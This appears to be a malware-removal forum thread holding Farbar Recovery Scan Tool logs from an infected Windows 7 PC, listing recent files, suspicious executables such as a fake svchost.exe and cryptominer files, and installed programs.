2018-10-20 14:04 - 2018-10-20 14:04 - 004220318 _____ C:\Users\Betts\Downloads\Megaman Battle Network 6 - Cybeast Gregar (U).zip
2018-10-20 14:03 - 2018-10-20 14:03 - 005247496 _____ C:\Users\Betts\Downloads\Metroid - Zero Mission (U) [!].zip
2018-10-20 14:02 - 2018-10-20 14:03 - 003849828 _____ C:\Users\Betts\Downloads\Metal Slug Advance (U).zip
2018-10-20 13:19 - 2018-10-20 13:20 - 005328420 _____ C:\Users\Betts\Downloads\Pokemon - Fire Red Version (U) (V1.1).zip
2018-10-20 13:18 - 2018-10-20 13:18 - 004724411 _____ C:\Users\Betts\Downloads\Kirby - Nightmare in Dreamland (U) [!].zip
2018-10-19 22:36 - 2018-10-28 11:47 - 000000000 ____D C:\Users\Betts\Desktop\vitahacks
2018-10-19 21:51 - 2018-10-19 21:53 - 000000000 ____D C:\Users\Betts\AppData\Roaming\soarqin
2018-10-19 21:21 - 2018-10-19 21:24 - 005845650 _____ C:\Users\Betts\Downloads\FinalHE_v1.5_win32.7z
2018-10-19 20:46 - 2018-10-19 20:46 - 000018486 _____ C:\Users\Betts\Downloads\bandcamp-dl-master.zip
2018-10-19 02:08 - 2018-10-19 02:08 - 162152863 _____ C:\Users\Betts\Downloads\PCSE01116.rar
2018-10-18 22:16 - 2018-10-18 22:16 - 467408743 _____ C:\Users\Betts\Downloads\Bastion.7z
2018-10-18 21:46 - 2018-10-18 21:46 - 000001065 _____ C:\Users\Public\Desktop\WinSCP.lnk
2018-10-18 21:40 - 2018-10-18 21:41 - 010191712 _____ (Martin Prikryl ) C:\Users\Betts\Downloads\WinSCP-5.13.4-Setup.exe
2018-10-18 21:07 - 2018-10-18 21:08 - 001196819 _____ C:\Users\Betts\Downloads\Vitamin_v2.0.vpk
2018-10-17 20:30 - 2018-10-17 21:03 - 630058137 _____ C:\Users\Betts\Downloads\Frank Ocean - Blonde - 2016 - Vinyl 24bit-20181017T122952Z-001.zip
2018-10-17 19:57 - 2018-10-17 20:13 - 304152722 _____ C:\Users\Betts\Downloads\Tyler, The Creator - Scum Fk Flower Boy (2017) FLAC-20181017T115746Z-001.zip
2018-10-17 00:26 - 2018-10-17 00:28 - 029946599 _____ C:\Users\Betts\Downloads\Sunflower - FLAC.zip
2018-10-17 00:19 - 2018-10-17 00:26 - 134742490 _____ C:\Users\Betts\Downloads\boy pablo - Roy Pablo.zip
2018-10-17 00:00 - 2018-10-17 00:00 - 095669742 _____ C:\Users\Betts\Downloads\Gus Dapperton - You Think You're a Comic!.zip
2018-10-16 23:53 - 2018-10-16 23:53 - 035378219 _____ C:\Users\Betts\Downloads\Gus Dapperton - Yellow and Such.zip
2018-10-16 23:32 - 2018-10-16 23:32 - 000010142 _____ C:\Users\Betts\Downloads\RedSea-master.zip
2018-10-15 18:25 - 2018-10-15 18:27 - 018619432 _____ C:\Users\Betts\Downloads\OTEGeographyLessons.zip
2018-10-15 18:15 - 2018-10-15 18:20 - 038987309 _____ C:\Users\Betts\Downloads\OCSTheMidnightEmotion.rar
2018-10-15 18:12 - 2018-10-15 18:13 - 019195032 _____ C:\Users\Betts\Downloads\TTala.zip
2018-10-15 18:03 - 2018-10-15 18:07 - 050552315 _____ C:\Users\Betts\Downloads\SOSWhateverThatWas.zip
2018-10-14 14:33 - 2018-10-14 14:34 - 000509876 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-3(1).pdf
2018-10-14 14:33 - 2018-10-14 14:33 - 000513356 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-2(1).pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000783891 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-1.pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000653176 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-4(1).pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000618669 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-2(1).pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000603772 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-3(1).pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000593259 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-1(1).pdf
2018-10-13 16:12 - 2018-10-13 16:13 - 000269906 _____ C:\Users\Betts\Downloads\National Museum Visit Guidelines.pdf
2018-10-12 19:19 - 2018-10-12 19:19 - 008678408 _____ C:\Users\Betts\Downloads\PH_patch_20181008to20181010_m6ft255i.exe
2018-10-12 18:40 - 2018-10-12 19:17 - 272476088 _____ C:\Users\Betts\Downloads\PH_patch_20181001to20181008_zpfenacb.exe
2018-10-12 17:40 - 2018-10-12 17:47 - 112919551 _____ C:\Users\Betts\Downloads\Head in the Clouds.zip
2018-10-12 17:38 - 2018-10-12 17:39 - 005977892 _____ C:\Users\Betts\Downloads\01 Peach Jam.m4a
2018-10-12 17:38 - 2018-10-12 17:38 - 004101472 _____ C:\Users\Betts\Downloads\05 CANT GET OVER YOU (feat. Clams C.m4a
2018-10-12 08:55 - 2018-10-12 08:55 - 000003450 _____ C:\Users\Betts\Downloads\11854839 - Copy of Grades - SY2018-2019-H1 Term 1.pdf
2018-10-10 20:53 - 2018-10-10 20:54 - 002999584 _____ C:\Users\Betts\Downloads\drive-download-20181010T125352Z-001.zip
2018-10-10 20:31 - 2018-10-10 20:31 - 000513356 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-2.pdf
2018-10-10 20:31 - 2018-10-10 20:31 - 000509876 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-3.pdf
2018-10-10 20:20 - 2018-10-10 20:20 - 000593259 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-1.pdf
2018-10-10 20:13 - 2018-10-10 20:13 - 000653176 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-4.pdf
2018-10-10 20:02 - 2018-10-10 20:02 - 000603772 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-3.pdf
2018-10-10 19:52 - 2018-10-10 19:52 - 000062309 _____ C:\Users\Betts\Downloads\Quiz.pptx
2018-10-09 21:00 - 2018-10-09 21:00 - 000018895 _____ C:\Users\Betts\Downloads\scdl-master.zip
2018-10-09 20:52 - 2018-10-09 20:52 - 000072526 _____ C:\Users\Betts\Downloads\Dummy-Critique_2018-2019-T2.pdf
2018-10-08 22:43 - 2018-10-08 22:43 - 000096290 _____ C:\Users\Betts\Downloads\bcg_comp_chapter4.pdf
2018-10-07 21:45 - 2018-10-07 21:45 - 001346432 _____ C:\Users\Betts\Downloads\drive-download-20181007T134510Z-001.zip
2018-10-07 15:22 - 2018-10-07 15:22 - 000000573 _____ C:\Windows\SysWOW64\nativelog.txt
2018-10-07 14:48 - 2018-10-07 14:49 - 016239064 _____ (Ventis Media Inc. ) C:\Users\Betts\Downloads\MediaMonkey_4.1.21.1875.exe
2018-10-07 14:46 - 2004-12-18 20:32 - 000038229 ____N (Generic) C:\Windows\SysWOW64\Drivers\StMp3Rec.sys
2018-10-07 14:45 - 2018-10-07 14:45 - 000000000 ____D C:\Windows\Downloaded Installations
2018-10-07 14:40 - 2018-10-07 14:45 - 059310760 _____ (Apple Computer, Inc. ) C:\Users\Betts\Downloads\iPodSetup.exe
2018-10-06 23:17 - 2018-10-06 23:18 - 002172676 _____ C:\Users\Betts\Downloads\Social REalism in the PHilippines Patrick Flores.pdf
2018-10-06 23:16 - 2018-10-06 23:16 - 000395753 _____ C:\Users\Betts\Downloads\Oct Nov Dec Group Members 2nd term 2018.pdf
2018-10-06 21:17 - 2018-10-09 21:41 - 000001417 _____ C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-10-06 21:17 - 2018-10-06 21:19 - 000000000 ____D C:\Users\Betts\AppData\Local\minergate
2018-10-06 21:14 - 2018-10-06 21:16 - 019537960 _____ C:\Users\Betts\Downloads\MinerGate-8.3-win64.exe
2018-10-06 21:01 - 2018-10-06 21:01 - 000441323 _____ C:\Users\Betts\Downloads\Miner___Minergate.rar
2018-10-06 20:50 - 2018-10-06 20:52 - 000000090 _____ C:\Users\Betts\Downloads\minergate_claymore_cpu_xmr.bat
2018-10-04 18:42 - 2018-10-28 11:46 - 000000000 ____D C:\Users\Betts\Desktop\CURATED
2018-10-03 21:41 - 2018-10-03 21:41 - 000329051 _____ C:\Users\Betts\Downloads\format.zip
2018-10-03 00:56 - 2018-10-03 00:56 - 000000033 _____ C:\Users\Betts\AppData\Roaming\AdobeWLCMCache.dat

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-11-01 13:18 - 2018-01-18 23:28 - 003344536 _____ C:\Users\Betts\AppData\Roaming\msconfig.ini
2018-11-01 13:15 - 2013-04-28 10:48 - 000002235 _____ C:\Windows\epplauncher.mif
2018-11-01 13:11 - 2016-08-20 19:56 - 000000000 ____D C:\Users\Betts\AppData\Roaming\WindSolutions
2018-11-01 12:30 - 2016-02-08 20:39 - 000000000 ____D C:\Users\Betts\AppData\Roaming\Spotify
2018-11-01 10:39 - 2016-01-14 17:11 - 000000000 ____D C:\Users\Betts\AppData\Roaming\vlc
2018-11-01 10:36 - 2009-07-14 12:45 - 000038720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-11-01 10:36 - 2009-07-14 12:45 - 000038720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-11-01 10:35 - 2017-06-11 23:02 - 000000000 ____D C:\Users\Betts\AppData\LocalLow\Mozilla
2018-11-01 10:31 - 2015-10-05 18:10 - 000000000 ____D C:\Users\Betts\Documents\ViberDownloads
2018-11-01 10:28 - 2017-12-07 20:12 - 000000000 ____D C:\Users\Betts\AppData\Local\CrashDumps
2018-11-01 10:25 - 2016-02-08 20:45 - 000000000 ____D C:\Users\Betts\AppData\Local\Spotify
2018-11-01 10:23 - 2018-01-20 17:47 - 000000458 _____ C:\Windows\Tasks\gxx speed launcher.job
2018-10-31 14:36 - 2016-12-14 22:01 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-10-30 20:08 - 2018-06-23 20:21 - 000000000 ____D C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2018-10-29 12:46 - 2018-02-06 17:03 - 000000000 ____D C:\Users\Betts\AppData\Local\Viber
2018-10-29 12:46 - 2015-10-05 17:34 - 000000000 ____D C:\Users\Betts\AppData\Roaming\ViberPC
2018-10-29 12:36 - 2018-08-23 19:35 - 000017529 _____ C:\ProgramData\2.exe
2018-10-29 12:36 - 2018-08-22 19:22 - 000017529 _____ C:\ProgramData\1.exe
2018-10-29 00:30 - 2014-01-26 11:43 - 000000305 ____H C:\Users\Betts\Documents\.picasa.ini
2018-10-28 11:48 - 2018-07-07 11:31 - 000000000 ____D C:\Users\Betts\Desktop\G11-FILES
2018-10-28 11:48 - 2018-02-16 09:20 - 000000000 ____D C:\Users\Betts\Desktop\memes
2018-10-28 11:46 - 2015-01-04 18:38 - 000000000 ____D C:\Users\Betts\Desktop\Songs
2018-10-28 11:45 - 2017-12-07 17:48 - 000000000 ____D C:\Users\Betts\Desktop\EDITS-BRUCEY
2018-10-28 08:14 - 2015-04-29 20:36 - 000000000 ____D C:\Windows\SysWOW64\directx
2018-10-27 18:13 - 2015-03-22 13:12 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-10-27 08:06 - 2014-11-12 17:53 - 000000000 ____D C:\temp
2018-10-26 22:43 - 2017-08-26 22:10 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-10-23 20:53 - 2017-09-08 21:30 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-10-22 20:46 - 2017-08-18 22:43 - 000000000 ____D C:\Program Files (x86)\arcai.com
2018-10-20 12:04 - 2017-03-25 22:55 - 000000600 _____ C:\Users\Betts\AppData\Roaming\winscp.rnd
2018-10-19 02:44 - 2009-07-14 13:13 - 000006426 _____ C:\Windows\system32\PerfStringBackup.INI
2018-10-18 21:46 - 2017-03-25 22:50 - 000001077 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinSCP.lnk
2018-10-18 21:46 - 2017-03-25 22:50 - 000000000 ____D C:\Program Files (x86)\WinSCP
2018-10-15 20:01 - 2018-08-13 20:48 - 000000512 ____H C:\Users\Betts\Downloads\.picasa.ini
2018-10-14 09:23 - 2016-07-31 19:04 - 000000000 ____D C:\Users\Betts\AppData\Roaming\deluge
2018-10-07 15:34 - 2014-02-22 14:14 - 000000000 ____D C:\Users\Betts\AppData\Local\ElevatedDiagnostics
2018-10-07 15:22 - 2013-09-22 14:50 - 000000000 ____D C:\Program Files (x86)\Minecraft
2018-10-07 15:22 - 2013-06-23 16:40 - 000000000 ____D C:\Users\Betts\AppData\Roaming\.minecraft
2018-10-07 15:19 - 2016-02-23 18:41 - 000000000 ____D C:\Users\Betts\AppData\Roaming\MediaMonkey
2018-10-07 15:04 - 2013-05-31 13:39 - 000000000 ____D C:\Users\Betts\AppData\LocalLow\Adobe
2018-10-07 14:47 - 2013-04-28 10:30 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2018-10-07 14:46 - 2009-07-14 11:20 - 000000000 ____D C:\Windows\inf
2018-10-06 15:24 - 2017-10-15 23:32 - 000000000 ____D C:\Users\Betts\.idlerc
2018-10-05 22:14 - 2013-07-27 09:57 - 000000000 ____D C:\Games
2018-10-03 00:57 - 2015-06-16 21:27 - 000000918 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000UA.job
2018-10-02 21:56 - 2015-06-16 21:27 - 000000866 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000Core.job
2018-10-02 19:29 - 2009-07-14 12:45 - 005237776 _____ C:\Windows\system32\FNTCACHE.DAT
2018-10-02 19:20 - 2009-07-14 13:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT

==================== Files in the root of some directories =======

2018-08-22 19:22 - 2018-10-29 12:36 - 000017529 _____ () C:\ProgramData\1.exe
2018-08-23 19:35 - 2018-10-29 12:36 - 000017529 _____ () C:\ProgramData\2.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000285184 ____H (Microsoft Corporation) C:\ProgramData\audio.exe
2018-08-22 20:32 - 2018-08-18 06:21 - 000603352 _____ (Alexander Roshal) C:\ProgramData\xhhjtiwtw.exe
2018-01-17 15:58 - 2018-01-17 19:17 - 001105920 _____ (Microsoft) C:\ProgramData\XMR Builder.exe
2018-10-03 00:56 - 2018-10-03 00:56 - 000000033 _____ () C:\Users\Betts\AppData\Roaming\AdobeWLCMCache.dat
2016-08-13 10:40 - 2016-08-13 11:57 - 000002032 _____ () C:\Users\Betts\AppData\Roaming\droid4xinstaller.log
2018-01-18 23:28 - 2018-11-01 13:18 - 003344536 _____ () C:\Users\Betts\AppData\Roaming\msconfig.ini
2013-12-23 18:06 - 2016-03-25 22:32 - 000045270 _____ () C:\Users\Betts\AppData\Roaming\room_v3.dat
2017-03-25 22:55 - 2018-10-20 12:04 - 000000600 _____ () C:\Users\Betts\AppData\Roaming\winscp.rnd
2018-08-22 19:27 - 2018-08-22 19:27 - 000011568 _____ () C:\Users\Betts\AppData\Local\InstallationConfiguration.xml
2018-08-22 19:27 - 2018-08-22 19:27 - 000140800 _____ () C:\Users\Betts\AppData\Local\installer.dat
2018-06-12 22:24 - 2018-06-12 22:24 - 000004096 ____H () C:\Users\Betts\AppData\Local\keyfile3.drm
2018-10-27 08:05 - 2018-10-27 08:05 - 000000218 _____ () C:\Users\Betts\AppData\Local\recently-used.xbel
2017-12-07 19:22 - 2018-01-13 18:27 - 000007608 _____ () C:\Users\Betts\AppData\Local\Resmon.ResmonCfg
2018-08-22 19:27 - 2018-08-22 19:27 - 001413120 _____ () C:\Users\Betts\AppData\Local\sham.db
2014-08-31 10:30 - 2014-08-31 10:30 - 000000000 _____ () C:\Users\Betts\AppData\Local\{7018210F-C569-4660-8EC7-AF4BD353B0B6}
2017-11-15 18:57 - 2017-11-15 18:57 - 000000345 _____ () C:\Users\Betts\AppData\Local\~Report2.txt

Files to move or delete:
====================
C:\Users\Betts\AppData\Local\Temp\svchost.exe ..
C:\ProgramData\audio.exe ..
C:\Users\Betts\AppData\Roaming\msconfig.ini


Some files in TEMP:
====================
2018-08-22 20:31 - 2018-08-22 20:31 - 000552448 _____ () C:\Users\Betts\AppData\Local\Temp\11AD.tmp.exe
2018-08-22 19:32 - 2018-08-22 19:32 - 000495104 _____ () C:\Users\Betts\AppData\Local\Temp\1B4C.tmp.exe
2018-08-22 20:31 - 2018-08-22 20:31 - 000185104 _____ () C:\Users\Betts\AppData\Local\Temp\222.tmp.exe
2018-08-22 19:26 - 2018-08-22 21:06 - 000079872 _____ () C:\Users\Betts\AppData\Local\Temp\23435.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163328 _____ () C:\Users\Betts\AppData\Local\Temp\2FA4.tmp.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000110592 _____ () C:\Users\Betts\AppData\Local\Temp\317.tmp.exe
2018-08-22 19:20 - 2018-08-22 19:26 - 000001020 _____ () C:\Users\Betts\AppData\Local\Temp\419204dddd.exe
2018-08-22 19:26 - 2018-08-22 21:06 - 010522026 _____ () C:\Users\Betts\AppData\Local\Temp\allradio_4.27_portable.exe
2018-08-22 19:28 - 2018-08-22 19:29 - 001004032 _____ () C:\Users\Betts\AppData\Local\Temp\AmazonShoppingAssistant.exe
2018-08-22 19:26 - 2018-08-22 19:26 - 000020480 _____ (CatX) C:\Users\Betts\AppData\Local\Temp\cubesta.exe
2018-08-22 19:32 - 2018-08-22 19:32 - 041735680 _____ (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\DBBC.tmp.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163840 _____ () C:\Users\Betts\AppData\Local\Temp\F83D.tmp.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 004009147 _____ () C:\Users\Betts\AppData\Local\Temp\fag.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 000622592 _____ (DianneLMeans@armyspy.com ) C:\Users\Betts\AppData\Local\Temp\fagw.exe
2018-04-29 14:05 - 2018-07-24 14:30 - 000450880 _____ (Garena Online ) C:\Users\Betts\AppData\Local\Temp\Garena.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000420191 _____ ( ) C:\Users\Betts\AppData\Local\Temp\global_installer.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 002291565 _____ (Godogic ) C:\Users\Betts\AppData\Local\Temp\JavaSetup_2179753812.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000176912 _____ () C:\Users\Betts\AppData\Local\Temp\ketup.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163840 _____ () C:\Users\Betts\AppData\Local\Temp\KYlXSzGXn6oMeeHruwfwlWqCS.exe
2018-08-22 19:27 - 2018-08-22 21:10 - 000484352 _____ () C:\Users\Betts\AppData\Local\Temp\lame_enc.dll
2018-08-22 21:03 - 2018-08-21 04:01 - 000858912 _____ (Malwarebytes) C:\Users\Betts\AppData\Local\Temp\mb-clean.exe
2018-08-22 21:03 - 2018-08-22 21:00 - 082624400 _____ (Malwarebytes ) C:\Users\Betts\AppData\Local\Temp\mb3-setup-consumer-3.5.1.2522-1.0.421-1.0.6439.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 002951680 _____ (©Ludekolfoidgu kyosehicell ) C:\Users\Betts\AppData\Local\Temp\MediaPlay.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000181520 _____ () C:\Users\Betts\AppData\Local\Temp\merun.exe
2018-08-22 19:29 - 2018-08-22 19:29 - 000290304 _____ () C:\Users\Betts\AppData\Local\Temp\MPlayer1006.exe
2018-08-22 19:29 - 2018-08-22 19:29 - 000000000 _____ () C:\Users\Betts\AppData\Local\Temp\novol.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00000.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00001.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00002.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00003.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00004.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00005.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00006.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000343552 _____ () C:\Users\Betts\AppData\Local\Temp\RegOrganizer.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 002294272 _____ (TODO: <Company name>) C:\Users\Betts\AppData\Local\Temp\setup.exe
2018-08-22 19:27 - 2018-08-22 19:28 - 001323008 _____ (TigerTrade ) C:\Users\Betts\AppData\Local\Temp\sprun.exe
2018-10-06 21:04 - 2018-11-01 10:24 - 000169984 _____ () C:\Users\Betts\AppData\Local\Temp\svchost.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000339968 _____ () C:\Users\Betts\AppData\Local\Temp\TigerTrade.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 000016384 _____ (Nicole R. Cosentino ) C:\Users\Betts\AppData\Local\Temp\tuna.exe
2018-10-07 15:22 - 2017-04-06 01:05 - 000134000 _____ () C:\Users\Betts\AppData\Local\Temp\Uninstall.exe
2018-05-09 07:29 - 2018-05-09 07:29 - 001130840 _____ (Google Inc.) C:\Users\Betts\AppData\Local\Temp\{E2831398-803C-4CAF-A96F-A6261E0523C5}-GoogleUpdateSetup.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-10-02 20:08

==================== End of FRST.txt ============================
 

Broni

Malware Annihilator
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24.10.2018
Ran by Betts (01-11-2018 13:18:23)
Running from C:\Users\Betts\Desktop
Windows 7 Professional Service Pack 1 (X64) (2013-04-28 02:26:42)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1722513563-2756437970-1780137624-500 - Administrator - Disabled)
Betts (S-1-5-21-1722513563-2756437970-1780137624-1000 - Administrator - Enabled) => C:\Users\Betts
Guest (S-1-5-21-1722513563-2756437970-1780137624-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-1722513563-2756437970-1780137624-1003 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

A360 Desktop (HKLM\...\{7758802D-9486-4883-9927-CCAC366A3BA4}) (Version: 7.2.3.1800 - Autodesk)
ACA & MEP 2017 Object Enabler (HKLM\...\{28B89EEF-0004-0000-5102-CF3F3A09B77D}) (Version: 7.9.45.0 - Autodesk) Hidden
ACAD Private (HKLM\...\{28B89EEF-0001-0000-3102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
Acrylic Wi-Fi Professional v3.2 (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{FBD2EDDA-2B1B-49A2-9147-99CBCC5F10E5}_is1) (Version: 3.2 - Tarlogic Research S.L.)
Adobe Acrobat 5.0 (HKLM-x32\...\Adobe Acrobat 5.0) (Version: 5.0 - Adobe Systems, Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 19.008.20080 - Adobe Systems Incorporated)
Adobe After (HKLM\...\{6A915992-D887-4897-82F5-950EDD12DEB1}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe After Effects CC 2018 (HKLM-x32\...\AEFT_15_0_0) (Version: 15.0.0 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 4.3.0.256 - Adobe Systems Incorporated)
Adobe Flash Player 27 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 27.0.0.187 - Adobe Systems Incorporated)
Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.187 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe InDesign CC 2015 (HKLM-x32\...\{BC448016-6F11-1014-B0EA-97CEE6E26CB8}) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.5.1 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.1 - Adobe Systems Incorporated)
Adobe premier (HKLM\...\{A33A5D8E-C860-48A7-B8DF-11B354570F70}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2018 (HKLM\...\{7DC3F900-68E5-40F1-869D-9D20A69D8A1D}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2018 (HKLM-x32\...\PPRO_12_0_0) (Version: 12.0.0 - Adobe Systems Incorporated)
Adobe Update Management Tool (HKLM-x32\...\{534A7A1A-7102-4AF6-23EA-7CD279C7B625}_is1) (Version: 8.0 - PainteR)
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
AirServer Universal (x64) (HKLM\...\{69380A3E-760E-4AA7-AED4-B10F6FA47B30}) (Version: 5.1.0 - App Dynamic)
AirServer Universal (x64) 4.2.0 (HKLM-x32\...\{a2410454-c7d7-4b07-8d15-217317d48e4c}) (Version: 4.2.0 - AppDynamic ehf)
Akamai NetSession Interface (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\Akamai) (Version: - Akamai Technologies, Inc)
Ansel (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Ansel) (Version: 378.49 - NVIDIA Corporation) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{29DB9165-5FC1-48F0-9188-26123F526848}) (Version: 5.0.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{5905C8CF-1C88-4478-A48E-4E458AD1BC7E}) (Version: 5.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{D4D86CB2-2370-4691-8272-3869EDED6C64}) (Version: 10.0.0.18 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Arc (HKLM-x32\...\{CED8E25B-122A-4E80-B612-7F99B93284B3}) (Version: 1.0.0.9668 - Perfect World Entertainment)
ArcSoft PhotoStudio 5.5 (HKLM-x32\...\{85309D89-7BE9-4094-BB17-24999C6118FC}) (Version: - ArcSoft)
Asmedia ASM104x USB 3.0 Host Controller Driver (HKLM-x32\...\{E4FB0B39-C991-4EE7-95DD-1A1A7857D33D}) (Version: 1.10.0.0 - Asmedia Technology)
Atom (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\atom) (Version: 1.23.3 - GitHub Inc.)
Audacity 2.0.6 (HKLM-x32\...\Audacity_is1) (Version: 2.0.6 - Audacity Team)
AutoCAD 2017 - English (HKLM\...\{28B89EEF-0001-0409-2102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
